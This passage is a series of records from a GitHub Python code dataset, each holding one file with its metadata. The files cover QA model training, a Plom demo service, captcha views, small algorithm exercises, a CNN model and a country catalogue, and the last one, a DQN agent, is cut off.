RNN',\n)\nparser.add_argument(\n '--dropout',\n type=float,\n default=0.,\n help='dropout on passage and question vectors',\n)\n\n\ndef _print_arguments(args):\n \"\"\"Pretty prints command line args to stdout.\n\n Args:\n args: `argparse` object.\n \"\"\"\n\n args_dict = vars(args)\n pprint.pprint(args_dict)\n\n\ndef _select_model(args):\n \"\"\"\n Selects and initializes model. To integrate custom models, (1)\n add the model name to the parser choices above, and (2) modify\n the conditional statements to include an instance of the model.\n\n Args:\n args: `argparse` object.\n\n Returns:\n Instance of a PyTorch model supplied with args.\n \"\"\"\n if args.model == 'baseline':\n return BaselineReader(args)\n else:\n raise RuntimeError(f'model \\'{args.model}\\' not recognized!')\n\n\ndef _early_stop(args, eval_history):\n \"\"\"\n Determines early stopping conditions. If the evaluation loss has\n not improved after `args.early_stop` epoch(s), then training\n is ended prematurely. 
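# Concrete check of the early-stopping rule described here: with
# args.early_stop == 3, training halts once the last three epochs produced no
# checkpoint (i.e. no eval-loss improvement).
history = [True, True, False, False, False]
early_stop = 3
print(len(history) > early_stop and not any(history[-early_stop:]))  # True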
\n\n Args:\n args: `argparse` object.\n eval_history: List of booleans that indicate whether an epoch resulted\n in a model checkpoint, or in other words, if the evaluation loss\n was lower than previous losses.\n\n Returns:\n Boolean indicating whether training should stop.\n \"\"\"\n return (\n len(eval_history) > args.early_stop\n and not any(eval_history[-args.early_stop:])\n )\n\n\ndef _calculate_loss(\n start_logits, end_logits, start_positions, end_positions\n):\n \"\"\"\n Calculates cross-entropy loss for QA samples, which is defined as\n the mean of the loss values incurred by the starting and ending position\n distributions when compared to the gold endpoints.\n\n Args:\n start_logits: Predicted distribution over start positions.\n end_logits: Predicted distribution over end positions.\n start_positions: Gold start positions.\n end_positions: Gold end positions.\n\n Returns:\n Loss value for a batch of sasmples.\n \"\"\"\n # If the gold span is outside the scope of the maximum\n # context length, then ignore these indices when computing the loss.\n ignored_index = start_logits.size(1)\n start_positions.clamp_(0, ignored_index)\n end_positions.clamp_(0, ignored_index)\n\n # Compute the cross-entropy loss for the start and end logits.\n criterion = nn.CrossEntropyLoss(ignore_index=ignored_index)\n start_loss = criterion(start_logits, start_positions)\n end_loss = criterion(end_logits, end_positions)\n\n return (start_loss + end_loss) / 2.\n\n\ndef train(args, epoch, model, dataset):\n \"\"\"\n Trains the model for a single epoch using the training dataset.\n\n Args:\n args: `argparse` object.\n epoch: Epoch number (used in the `tqdm` bar).\n model: Instance of the PyTorch model.\n dataset: Training dataset.\n\n Returns:\n Training cross-entropy loss normalized across all samples.\n \"\"\"\n # Set the model in \"train\" mode.\n model.train()\n\n # Cumulative loss and steps.\n train_loss = 0.\n train_steps = 0\n\n # Set up optimizer.\n optimizer = optim.Adam(\n model.parameters(),\n lr=args.learning_rate,\n weight_decay=args.weight_decay,\n )\n\n # Set up training dataloader. Creates `args.batch_size`-sized\n # batches from available samples.\n train_dataloader = tqdm(\n dataset.get_batch(shuffle_examples=args.shuffle_examples),\n **_TQDM_OPTIONS,\n )\n\n for batch in train_dataloader:\n # Zero gradients.\n optimizer.zero_grad()\n\n # Forward inputs, calculate loss, optimize model.\n start_logits, end_logits = model(batch)\n loss = _calculate_loss(\n start_logits,\n end_logits,\n batch['start_positions'],\n batch['end_positions'],\n )\n loss.backward()\n if args.grad_clip > 0.:\n torch.nn.utils.clip_grad_norm_(model.parameters(), args.grad_clip)\n optimizer.step()\n\n # Update tqdm bar.\n train_loss += loss.item()\n train_steps += 1\n train_dataloader.set_description(\n f'[train] epoch = {epoch}, loss = {train_loss / train_steps:.6f}'\n )\n\n return train_loss / train_steps\n\n\ndef evaluate(args, epoch, model, dataset):\n \"\"\"\n Evaluates the model for a single epoch using the development dataset.\n\n Args:\n args: `argparse` object.\n epoch: Epoch number (used in the `tqdm` bar).\n model: Instance of the PyTorch model.\n dataset: Development dataset.\n\n Returns:\n Evaluation cross-entropy loss normalized across all samples.\n \"\"\"\n # Set the model in \"evaluation\" mode.\n model.eval()\n\n # Cumulative loss and steps.\n eval_loss = 0.\n eval_steps = 0\n\n # Set up evaluation dataloader. Creates `args.batch_size`-sized\n # batches from available samples. 
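# Sketch of the clamp + ignore_index trick used in _calculate_loss above: gold
# endpoints that fall beyond the truncated context are clamped to one past the
# last logit index and then skipped by the criterion, contributing no loss.
import torch
import torch.nn as nn

logits = torch.randn(2, 5)             # (batch, context_length)
gold = torch.tensor([3, 9])            # second target is out of range
gold = gold.clamp(0, logits.size(1))   # -> tensor([3, 5])
loss = nn.CrossEntropyLoss(ignore_index=logits.size(1))(logits, gold)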
Does not shuffle.\n eval_dataloader = tqdm(\n dataset.get_batch(shuffle_examples=False),\n **_TQDM_OPTIONS,\n )\n\n with torch.no_grad():\n for batch in eval_dataloader:\n # Forward inputs, calculate loss.\n start_logits, end_logits = model(batch)\n loss = _calculate_loss(\n start_logits,\n end_logits,\n batch['start_positions'],\n batch['end_positions'],\n )\n\n # Update tqdm bar.\n eval_loss += loss.item()\n eval_steps += 1\n eval_dataloader.set_description(\n f'[eval] epoch = {epoch}, loss = {eval_loss / eval_steps:.6f}'\n )\n\n return eval_loss / eval_steps\n\n\ndef write_predictions(args, model, dataset):\n \"\"\"\n Writes model predictions to an output file. The official QA metrics (EM/F1)\n can be computed using `evaluation.py`. \n\n Args:\n args: `argparse` object.\n model: Instance of the PyTorch model.\n dataset: Test dataset (technically, the development dataset since the\n official test datasets are blind and hosted by official servers).\n \"\"\"\n # Load model checkpoint.\n model.load_state_dict(torch.load(args.model_path, map_location='cpu'))\n model.eval()\n\n # Set up test dataloader.\n test_dataloader = tqdm(\n dataset.get_batch(shuffle_examples=False),\n **_TQDM_OPTIONS,\n )\n\n # Output predictions.\n outputs = []\n\n with torch.no_grad():\n for (i, batch) in enumerate(test_dataloader):\n # Forward inputs.\n start_logits, end_logits = model(batch)\n\n # Form distributions over start and end positions.\n batch_start_probs = F.softmax(start_logits, 1)\n batch_end_probs = F.softmax(end_logits, 1)\n\n for j in range(start_logits.size(0)):\n # Find question index and passage.\n sample_index = args.batch_size * i + j\n qid, passage, _, _, _ = dataset.samples[sample_index]\n\n # Unpack start and end probabilities. Find the constrained\n # (start, end) pair that has the highest joint probability.\n start_probs = unpack(batch_start_probs[j])\n end_probs = unpack(batch_end_probs[j])\n start_index, end_index = search_span_endpoints(\n start_probs, end_probs\n )\n \n # Grab predicted span.\n pred_span = ' '.join(passage[start_index:(end_index + 1)])\n\n # Add prediction to outputs.\n outputs.append({'qid': qid, 'answer': pred_span})\n\n # Write predictions to output file.\n with open(args.output_path, 'w+') as f:\n for elem in outputs:\n f.write(f'{json.dumps(elem)}\\n')\n\n\ndef main(args):\n \"\"\"\n Main function for training, evaluating, and checkpointing.\n\n Args:\n args: `argparse` object.\n \"\"\"\n # Print arguments.\n print('\\nusing arguments:')\n _print_arguments(args)\n print()\n\n # Check if GPU is available.\n if not args.use_gpu and torch.cuda.is_available():\n print('warning: GPU is available but args.use_gpu = False')\n print()\n\n # Set up datasets.\n train_dataset = QADataset(args, args.train_path)\n dev_dataset = QADataset(args, args.dev_path)\n\n # Create vocabulary and tokenizer.\n vocabulary = Vocabulary(train_dataset.samples, args.vocab_size)\n tokenizer = Tokenizer(vocabulary)\n for dataset in (train_dataset, dev_dataset):\n dataset.register_tokenizer(tokenizer)\n args.vocab_size = len(vocabulary)\n args.pad_token_id = tokenizer.pad_token_id\n print(f'vocab words = {len(vocabulary)}')\n\n # Print number of samples.\n print(f'train samples = {len(train_dataset)}')\n print(f'dev samples = {len(dev_dataset)}')\n print()\n\n # Select model.\n model = _select_model(args)\n num_pretrained = model.load_pretrained_embeddings(\n vocabulary, args.embedding_path\n )\n pct_pretrained = round(num_pretrained / len(vocabulary) * 100., 2)\n print(f'using pre-trained 
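# search_span_endpoints comes from utils and is not shown in this file; from
# its usage above, its contract is to pick the (start, end) pair maximizing
# start_probs[start] * end_probs[end] subject to start <= end. A hedged O(n^2)
# sketch of that contract (the `window` cap on answer length is an assumption):
def search_span_endpoints_sketch(start_probs, end_probs, window=15):
    best, best_p = (0, 0), 0.0
    for i, ps in enumerate(start_probs):
        for j in range(i, min(i + window, len(end_probs))):
            if ps * end_probs[j] > best_p:
                best, best_p = (i, j), ps * end_probs[j]
    return best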
embeddings from \\'{args.embedding_path}\\'')\n print(\n f'initialized {num_pretrained}/{len(vocabulary)} '\n f'embeddings ({pct_pretrained}%)'\n )\n print()\n\n if args.use_gpu:\n model = cuda(args, model)\n\n params = sum(p.numel() for p in model.parameters() if p.requires_grad)\n print(f'using model \\'{args.model}\\' ({params} params)')\n print(model)\n print()\n\n if args.do_train:\n # Track training statistics for checkpointing.\n eval_history = []\n best_eval_loss = float('inf')\n\n # Begin training.\n for epoch in range(1, args.epochs + 1):\n # Perform training and evaluation steps.\n train_loss = train(args, epoch, model, train_dataset)\n eval_loss = evaluate(args, epoch, model, dev_dataset)\n\n # If the model's evaluation loss yields a global improvement,\n # checkpoint the model.\n eval_history.append(eval_loss < best_eval_loss)\n if eval_loss < best_eval_loss:\n best_eval_loss = eval_loss\n torch.save(model.state_dict(), args.model_path)\n \n print(\n f'epoch = {epoch} | '\n f'train loss = {train_loss:.6f} | '\n f'eval loss = {eval_loss:.6f} | '\n f\"{'saving model!' if eval_history[-1] else ''}\"\n )\n\n # If early stopping conditions are met, stop training.\n if _early_stop(args, eval_history):\n suffix = 's' if args.early_stop > 1 else ''\n print(\n f'no improvement after {args.early_stop} epoch{suffix}. '\n 'early stopping...'\n )\n print()\n break\n\n if args.do_test:\n # Write predictions to the output file. Use the printed command\n # below to obtain official EM/F1 metrics.\n write_predictions(args, model, dev_dataset)\n eval_cmd = (\n 'python3 evaluate.py '\n f'--dataset_path {args.dev_path} '\n f'--output_path {args.output_path}'\n )\n print()\n print(f'predictions written to \\'{args.output_path}\\'')\n print(f'compute EM/F1 with: \\'{eval_cmd}\\'')\n print()\n\n\nif __name__ == '__main__':\n main(parser.parse_args())\n","repo_name":"gregdurrett/nlp-qa-finalproj","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":15318,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"21"} +{"seq_id":"7996028002","text":"import fitz\nfrom pathlib import Path\nfrom time import sleep\n\nfrom django.core.management import call_command\n\n\nclass DemoHWBundleService:\n \"\"\"Handle creating homework bundles in the demo.\"\"\"\n\n def make_hw_bundle(self, bundle: dict):\n paper_number = bundle[\"paper_number\"]\n question_list = bundle[\"pages\"]\n\n print(\n f\"Making a homework bundle as paper {paper_number} with question-page mapping {question_list}\"\n )\n\n # question_list should be a list of lists eg [[1], [1,2], [], [2,3]]\n out_file = Path(f\"fake_hw_bundle_{paper_number}.pdf\")\n doc = fitz.Document()\n pg = 0\n for ql in question_list:\n pg += 1\n doc.new_page(-1)\n if ql:\n txt = f\"Paper.page {paper_number}.{pg}: contains info for question(s) {ql}\"\n else:\n txt = f\"Paper.page {paper_number}.{pg}: does not contain useful info - discard it!\"\n doc[-1].insert_text(\n (120, 50),\n text=txt,\n fontsize=18,\n color=[0, 0.25, 0.25],\n )\n\n doc.save(out_file)\n\n def map_homework_pages(self, homework_bundles=[]):\n print(\"Mapping homework pages to questions\")\n for bundle in homework_bundles:\n paper_number = bundle[\"paper_number\"]\n question_list = bundle[\"pages\"]\n\n bundle_name = f\"fake_hw_bundle_{paper_number}\"\n print(\n f\"Assigning pages in {bundle_name} to paper {paper_number} questions {question_list}\"\n )\n call_command(\n \"plom_paper_scan\",\n \"map\",\n bundle_name,\n \"-t\",\n 
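# Minimal standalone version of the bundle writer below, using the same PyMuPDF
# calls (fitz.Document, new_page, insert_text, save) for a one-page bundle:
import fitz

doc = fitz.Document()
doc.new_page(-1)                       # append a blank page
doc[-1].insert_text((120, 50), text='Paper.page 1.1', fontsize=18)
doc.save('fake_hw_bundle_demo.pdf')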
paper_number,\n \"-q\",\n str(question_list),\n )\n sleep(0.5)\n","repo_name":"plomgrading/plom","sub_path":"plom_server/Demo/services/demo_hw_bundles.py","file_name":"demo_hw_bundles.py","file_ext":"py","file_size_in_byte":1848,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"21"} +{"seq_id":"36522455972","text":"from googlesearch import search\nimport pandas as pd\nimport time\n\ndata = pd.read_csv(\"/media/thang/New Volume/Rasa-Chatbot/deepcare/CRAWL/CRAWL/spiders/data.csv\")\nstart_urls = []\nfor query in data['question']:\n time.sleep(5)\n for j in search(query, num=10, stop=10, pause=2):\n start_urls.append(j)\n\nf = open(\"link.txt\", \"a\")\nfor link in start_urls:\n f.write(link+\"\\n\")\nf.close()","repo_name":"nducthang/Question-Similarity-in-Medical","sub_path":"crawl-benh-vien-viet-duc/get_url.py","file_name":"get_url.py","file_ext":"py","file_size_in_byte":393,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"25267926195","text":"def return_set(lst, set_val):\n result_lst = []\n for index in range(len(lst)):\n get_in_val = int(lst[index])\n i = index + 1\n j = len(lst) - 1\n while i < j:\n if i > j or i == j:\n break\n sum_val = get_in_val + int(lst[i]) + int(lst[j])\n if sum_val == set_val:\n result_lst.append([get_in_val,lst[i],lst[j]])\n i = i + 1\n elif sum_val < set_val:\n i = i + 1\n elif sum_val > set_val:\n j = j-1\n return result_lst\n\nlst = [1,2,3,4,5]\nset_val = 9\nprint(return_set(lst,set_val))","repo_name":"mvndinesh/algorithms","sub_path":"ran.py","file_name":"ran.py","file_ext":"py","file_size_in_byte":632,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74384583091","text":"from time import time\nfrom line_profiler import LineProfiler\n\n\nclass Benchmark():\n \"\"\"\n This is a testing class for the benchmarking of functions.\n Input of the Benchmark class should be the function to test\n and the params (optional)\n \"\"\"\n\n def __init__(self, function, **params):\n self.function = function\n self.params = params\n\n def exec_time(self, reps=1):\n \"\"\"\n Calls function x-times and returns an array of computed execution times\n \"\"\"\n results = []\n for rep in range(reps):\n t0 = time()\n self.function(**self.params)\n t1 = time()\n results.append(t1 - t0)\n return results\n\n def profile_lines(self):\n \"\"\"\n A simple wrapper to call the line_profiler.\n Prints the line_profiler output\n \"\"\"\n lp = LineProfiler()\n lp_wrapper = lp(self.function)\n lp_wrapper(**self.params)\n lp.print_stats()\n","repo_name":"bendecoste/Deprecated-PySyft","sub_path":"syft/test/benchmark.py","file_name":"benchmark.py","file_ext":"py","file_size_in_byte":973,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"38147764646","text":"import tkinter as tk\nimport os\n\nexamples = [\n 'drone-stars.py',\n]\nexamples += sorted([f'pt-br/{f}' for f in os.listdir('../examples/pt-br') if f.endswith('.py')])\nkeys = [str(i) for i in range(1, 10)] + [chr(i) for i in range(ord('a'), ord('z')+1)]\n\nroot = tk.Tk()\n\ndef make_callback(example):\n def callback(*args):\n os.system(f'PYTHONPATH=. 
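# The Benchmark helper above wraps any function plus its kwargs; e.g. timing
# the two-pointer three-sum (return_set) from the earlier snippet. Putting both
# names in one scope is assumed here purely for illustration:
bench = Benchmark(return_set, lst=[1, 2, 3, 4, 5], set_val=9)
print(bench.exec_time(reps=3))   # three wall-clock timings in seconds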
python ../examples/{example}')\n return callback\n\ntk.Label(text='Examples', font='Arial 18 bold').pack()\nfor idx, example in enumerate(examples):\n callback = make_callback(example)\n tk.Button(text=f'{keys[idx]} - {example}', command=callback).pack(anchor='w')\n root.bind(f'', callback)\n\nroot.bind(f'', lambda _event: root.destroy())\nroot.mainloop()","repo_name":"rodrigorgs/tupy","sub_path":"examples/all_examples.py","file_name":"all_examples.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"21"} +{"seq_id":"21926674509","text":"import json\nfrom pprint import pprint\nfrom random import randrange, seed\n\nimport requests\n\nfrom app.scores import scores_table, table_exists, create\n\nbase_url = \"http://127.0.0.1:5000\"\nscores_path = \"/scores\"\nhighscores_path = \"/highscores\"\nlimit = \"?limit=5\"\n\n\ndef add_user_data(username, count=5):\n url = base_url + scores_path + username\n for x in range(3):\n score = randrange(10000)\n print(score)\n requests.put(url, data=str(score))\n\n\nif __name__ == \"__main__\":\n if table_exists():\n scores_table.delete()\n create()\n\n table = scores_table\n\n with open(\"../test/scores_data.json\") as json_file:\n scores = json.load(json_file)\n scores_table.upsert_scores(table, scores)\n\n seed(1234)\n\n # Check imported data\n response = requests.get(\"/scores\")\n assert response.status_code == 200\n\n # Add new user\n add_user_data(\"/user4\", 3)\n\n # Check user4 data\n response = requests.get(\"/scores\")\n assert response.status_code == 200\n\n url = base_url + highscores_path\n r = requests.get(url)\n assert response.status_code == 200\n pprint(r.json())\n\n url = base_url + highscores_path + limit\n r = requests.get(url)\n assert response.status_code == 200\n pprint(r.json())\n\n url = base_url + scores_path\n r = requests.get(url)\n assert response.status_code == 200\n pprint(r.json())\n","repo_name":"torbenmoeller/highscore","sub_path":"test/test_main.py","file_name":"test_main.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"24844393767","text":"import torch\nfrom torch import nn\nimport torch.nn.functional as F\n\n\nclass STIMCNN(nn.Module):\n \"\"\"\n Implementation of the model by (Zhao et al. 2021),\n A new bearing fault diagnosis method based on signal-to-image\n mapping and convolutional neural network (STIM-CNN).\n\n (Zhao et al. 2021) Jing Zhao, Shaopu Yang, Qiang Li, Yongqiang Liu,\n Xiaohui Gu, and Wenpeng Liu, “A new bearing fault diagnosis method\n based on signal-to-image mapping and convolutional neural network,”\n Measurement, vol. 176, p. 
109088, 2021,\n doi: 10.1016/j.measurement.2021.109088.\n \"\"\"\n\n def __init__(self, in_planes: int = 1, n_classes: int = 10):\n \"\"\"\n Parameters\n ----------\n in_planes: int\n The number of channels of input data.\n n_classes: int\n The number of classes of dataset.\n \"\"\"\n super(STIMCNN, self).__init__()\n self._conv_layers = nn.Sequential(\n nn.Conv2d(in_planes, 32, 5, 1, \"same\"),\n nn.BatchNorm2d(32),\n nn.ReLU(),\n nn.MaxPool2d(2, 2),\n nn.Conv2d(32, 64, 5, 1, \"same\"),\n nn.BatchNorm2d(64),\n nn.ReLU(),\n nn.MaxPool2d(2, 2),\n )\n\n with torch.no_grad():\n dummy = torch.rand(1, 1, 28, 28)\n dummy = self._conv_layers(dummy)\n dummy = torch.flatten(dummy, 1)\n lin_input = dummy.shape[1]\n\n self._linear_layers = nn.Sequential(\n nn.Linear(lin_input, 1024),\n nn.ReLU(),\n nn.Dropout(0.5),\n nn.Linear(1024, 256),\n nn.ReLU(),\n nn.Dropout(0.5),\n nn.Linear(256, n_classes),\n )\n\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n x = self._conv_layers(x)\n x = torch.flatten(x, 1)\n x = self._linear_layers(x)\n\n return x\n","repo_name":"junior209lsj/FaultDiagnosisOptimizerBenchmark","sub_path":"fdob/model/stimcnn.py","file_name":"stimcnn.py","file_ext":"py","file_size_in_byte":1888,"program_lang":"python","lang":"en","doc_type":"code","stars":32,"dataset":"github-code","pt":"21"} +{"seq_id":"6985852382","text":"# Assignment #4 - Juan Espinal Comp Sci 1026 A\r\n# Student Number - 251214614\r\n# Dec 6th, 2021 - This program takes a list of countries and updates their population, area, and continent values given a file of records\r\n# - All succesful updates are then written to \"output.txt\"\r\n\r\n\r\nfrom country import Country\r\n\r\n# class that contains all the countries\r\nclass CountryCatalogue ():\r\n def __init__(self, countryFile):\r\n\r\n # list that stores all the countries objects in a list\r\n self.countryCat = []\r\n # creates a country object of class Country ()\r\n self.countryObject = Country ()\r\n\r\n file = open (countryFile, \"r\")\r\n myFile = file.readlines()[1:] # Skips the first line\r\n\r\n # Goes through every line in the data file\r\n for line in myFile:\r\n # Strips the line based on whitespace\r\n line = line.strip()\r\n\r\n # Splits it into a list based on |\r\n splitLine = line.split(\"|\")\r\n\r\n # Adds a country to the catalogue\r\n self.country = splitLine [0]\r\n self.continent = splitLine [1]\r\n self.population = splitLine [2]\r\n self.area = splitLine [3]\r\n\r\n self.addCountry(self.country,self.population,self.area,self.continent)\r\n # Adds all the countries in data.txt to the country catalogue\r\n def addData (self,countryFile):\r\n file = open (countryFile, \"r\")\r\n myFile = file.readlines()[1:] # Skips the first line\r\n\r\n for line in myFile:\r\n # Strips the line based on whitespace\r\n line = line.strip()\r\n splitLine = line.split(\"|\")\r\n self.country = splitLine [0]\r\n self.continent = splitLine [1]\r\n self.population = splitLine [2]\r\n self.area = splitLine [3]\r\n\r\n self.addCountry(self.country,self.population,self.area,self.continent)\r\n\r\n\r\n def setPopulationOfCountry (self,setCountry, populationSet):\r\n # Goes through each element in the list of countries objects\r\n for i in range (len (self.countryCat)):\r\n # Finds if the country the user has input is equal to a country in the list\r\n if setCountry == self.countryCat[i].countryName:\r\n # set the population of the country as specified by the user\r\n self.countryCat[i].setPopulation (populationSet)\r\n\r\n\r\n\r\n def setAreaOfCountry (self, 
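# Usage sketch for STIMCNN above: inputs are 28x28 single-channel "signal
# images", matching the dummy tensor used to size the first linear layer.
import torch

model = STIMCNN(in_planes=1, n_classes=10)
logits = model(torch.rand(8, 1, 28, 28))
print(logits.shape)  # torch.Size([8, 10])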
setCountry,areaSet):\r\n        # Goes through each element in the list of countries objects\r\n        for i in range (len(self.countryCat)):\r\n            # Finds if the country the user has input is equal to a country in the list\r\n            if setCountry == self.countryCat[i].countryName:\r\n                # sets the area of the country as specified by the user\r\n                self.countryCat[i].setArea (areaSet)\r\n\r\n\r\n\r\n    def setContinentOfCountry (self, setCountry, continentSet):\r\n        for i in range (len(self.countryCat)):\r\n            if setCountry == self.countryCat[i].countryName:\r\n                self.countryCat[i].setContinent (continentSet)\r\n\r\n    # Returns the matching country object if it is already in the catalogue\r\n    def findCountry (self,country):\r\n        # Checks to see if an object of the Country Class is in the list of country objects Country Cat\r\n\r\n        if (len(self.countryCat)) != 0:\r\n            for i in range (len(self.countryCat)):\r\n                if self.countryCat[i].countryName == country.countryName:\r\n                    return country\r\n\r\n        return None\r\n\r\n    # Removes a country from the catalogue\r\n    def removeCountry (self, country):\r\n\r\n        for i in range (len (self.countryCat)):\r\n            if self.countryCat[i].countryName == country:\r\n                self.countryCat.pop (i)\r\n                break\r\n\r\n    # Adds a country to the catalogue\r\n    def addCountry (self, countryName= \"\", pop = \"\",area = \"\",cont = \"\"):\r\n        self.countryObject = Country (countryName)\r\n        self.countryObject.setPopulation(pop)\r\n        self.countryObject.setArea(area)\r\n        self.countryObject.setContinent(cont)\r\n\r\n        # Appends an object of class Country to the CountryCat list\r\n        # Essentially removes any duplicate countries\r\n        if self.findCountry(self.countryObject) == None:\r\n            self.countryCat.append(self.countryObject)\r\n\r\n\r\n    # prints every single country object\r\n    def printCountryCatalogue (self):\r\n        for i in self.countryCat:\r\n            print(i)\r\n\r\n\r\n    # Writes all the countries to a file, preferably called output.txt\r\n    def saveCountryCatalogue (self,fname):\r\n        saveFile = open (fname, \"w\")\r\n\r\n        lstofSortedCountries = []\r\n        lstofIndeces = []\r\n        lstofCountries = []\r\n        lstofPopulation = []\r\n        lstofSize = []\r\n        lstofContinents = []\r\n\r\n        # puts all the names, continent, populations, and area of countries in the catalogue of countries into their respective lists\r\n        for i in range (len(self.countryCat)):\r\n            lstofCountries.append (self.countryCat[i].countryName)\r\n            lstofContinents.append (self.countryCat[i].countryContinent)\r\n            lstofPopulation.append(self.countryCat[i].countryPopulation)\r\n            lstofSize.append(self.countryCat[i].countyArea)\r\n\r\n        # Sorts the countries in alphabetical order\r\n        for i in range (len(self.countryCat)):\r\n            lstofSortedCountries.append (self.countryCat[i].countryName)\r\n        # Sorts the countries in alphabetical order\r\n        lstofSortedCountries.sort()\r\n\r\n        # Finds the indeces of where the sorted countries are found in the original list of countries\r\n        for i in range (len(self.countryCat)):\r\n            lstofIndeces.append(lstofCountries.index (lstofSortedCountries[i]))\r\n\r\n        for i in range (len(self.countryCat)):\r\n            self.countryCat[i].setCountry(lstofSortedCountries[i])\r\n\r\n        # Changes the continent, population, and area of each country in the catalogue to their respective sorted countries\r\n        for i in range (len (self.countryCat)):\r\n            self.countryCat[i].setContinent(lstofContinents[lstofIndeces[i]])\r\n            self.countryCat[i].setPopulation (lstofPopulation[lstofIndeces[i]])\r\n            self.countryCat[i].setArea (lstofSize[lstofIndeces[i]])\r\n\r\n\r\n
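        # Note (editorial addition, not in the original assignment): the parallel\r\n        # lists and index bookkeeping above could be replaced by sorting the\r\n        # Country objects directly, e.g. self.countryCat.sort(key=lambda c: c.countryName).\r\n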
(\"Country|Continent|Population|Area\\n\")\r\n\r\n # writes the country name, continent, population,and area onto a file called output.txt\r\n for i in range (len(self.countryCat)):\r\n saveFile.write (self.countryCat[i].countryName+ \"|\"+self.countryCat[i].countryContinent + \"|\" + self.countryCat[i].countryPopulation+ \"|\" + self.countryCat[i].countyArea+ \"\\n\")","repo_name":"jespinal-uwo/CS-1026","sub_path":"Assignment-4/catalogue.py","file_name":"catalogue.py","file_ext":"py","file_size_in_byte":6710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15578634965","text":"from flask import Blueprint, request, make_response\nfrom utils.captcha import Captcha\nfrom io import BytesIO\nfrom exts import aliyunsms\nfrom utils import restful\nimport random\nfrom .forms import SMSCaptchaForm\nfrom utils import web_cache\nfrom tasks import send_sms_captcha\n\nbp = Blueprint('common', __name__, url_prefix='/c')\n\n\n@bp.route('/sms_captcha/', methods=[\"POST\"])\ndef sms_captcha():\n form = SMSCaptchaForm(request.form)\n if form.validate():\n telephone = form.telephone.data\n captcha = random.randint(100000, 999999)\n # result = aliyunsms.send_single(telephone, {\"code\": captcha})\n # if result:\n # web_cache.RedisCache().set(telephone, captcha)\n # else:\n # return restful.params_error(msg=\"发送失败\")\n send_sms_captcha(telephone, captcha)\n web_cache.RedisCache().set(telephone, captcha)\n return restful.success()\n else:\n return restful.params_error(msg=\"参数错误\")\n\n\n@bp.route('/captcha/')\ndef graph_captcha():\n text, image = Captcha.gene_graph_captcha()\n web_cache.RedisCache().set(text.lower(), text.lower())\n out = BytesIO()\n image.save(out, 'png')\n out.seek(0)\n resp = make_response(out.read())\n resp.content_type = 'image/png'\n return resp\n","repo_name":"lianmc123/website","sub_path":"apps/common/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"73877572854","text":"import sys\nfrom collections import deque\n\nn, m, v = map(int, sys.stdin.readline().split())\n\nedges = [[0 for __ in range(n+1)] for _ in range(n+1)]\n\n# 2차원 리스트를 통해 모든 간선의 연관 관계를 정의\nfor _ in range(m):\n first, second = map(int, (sys.stdin.readline().split()))\n edges[first][second] = 1\n edges[second][first] = 1\n\n\ndfsVisit, bfsVisit = [False]*(n+1), [False]*(n+1)\n\n\ndef dfs(start):\n if dfsVisit[start]:\n return\n dfsVisit[start] = True\n print(start, end=' ')\n\n for i in range(n):\n if edges[start][i+1] == 1:\n dfs(i+1)\n\n\ndef bfs(idx):\n bfsQue = deque([idx])\n bfsVisit[idx] = True\n while bfsQue:\n start = bfsQue.popleft()\n print(start, end=' ')\n\n for i in range(n):\n if edges[start][i+1] == 1 and not bfsVisit[i+1]:\n bfsQue.append(i+1)\n bfsVisit[i+1] = True\n\n\ndfs(v)\nprint()\nbfs(v)\n","repo_name":"gangslee/Coding-Test","sub_path":"백준/210106/1260 DFS와 BFS.py","file_name":"1260 DFS와 BFS.py","file_ext":"py","file_size_in_byte":932,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32876811781","text":"from typing import Optional\n\n# Definition for singly-linked list.\nclass ListNode:\n def __init__(self, val=0, next=None):\n self.val = val\n self.next = next\n \nclass Solution:\n def reverseKGroup(self, head: Optional[ListNode], k: int) -> Optional[ListNode]:\n if k == 1:\n return head\n \n node_list = [None] * k\n before_head = None\n answer = 
+{"seq_id":"32876811781","text":"from typing import Optional\n\n# Definition for singly-linked list.\nclass ListNode:\n    def __init__(self, val=0, next=None):\n        self.val = val\n        self.next = next\n    \nclass Solution:\n    def reverseKGroup(self, head: Optional[ListNode], k: int) -> Optional[ListNode]:\n        if k == 1:\n            return head\n        \n        node_list = [None] * k\n        before_head = None\n        answer = None\n        h = head\n        while(True):\n            i = 0\n            while(h and i < k):\n                node_list[i] = h\n                h = h.next\n                if h:\n                    i += 1\n            \n            if i + 1 < k:\n                break\n            \n            node_list[0].next = node_list[k - 1].next\n            for i in reversed(range(1, k)):\n                node_list[i].next = node_list[i - 1]\n            \n            if before_head:\n                before_head.next = node_list[k - 1]\n            else:\n                answer = node_list[k - 1]\n            before_head = node_list[0]\n        return answer\n\nn = 2\nhead = ListNode(1)\nh = head\nfor i in range(2, n + 1):\n    h.next = ListNode(i)\n    h = h.next\n\nh = Solution().reverseKGroup(head, 2)\nwhile(h):\n    print(h.val, end=' ')\n    h = h.next\nprint()","repo_name":"yeardream-high6/coding_test","sub_path":"이부경/LeetCode/100/25. Reverse Nodes in k-Group.py","file_name":"25. Reverse Nodes in k-Group.py","file_ext":"py","file_size_in_byte":1252,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"23110002901","text":"from gym.core import ObservationWrapper\nfrom gym.spaces import Box\nfrom keras.layers import Conv2D, Dense, Flatten\nimport keras\nimport numpy as np\nfrom scipy.misc import imresize\nimport tensorflow as tf\n\n\nclass DQNAgent(object):\n    \"\"\"\n    This is a 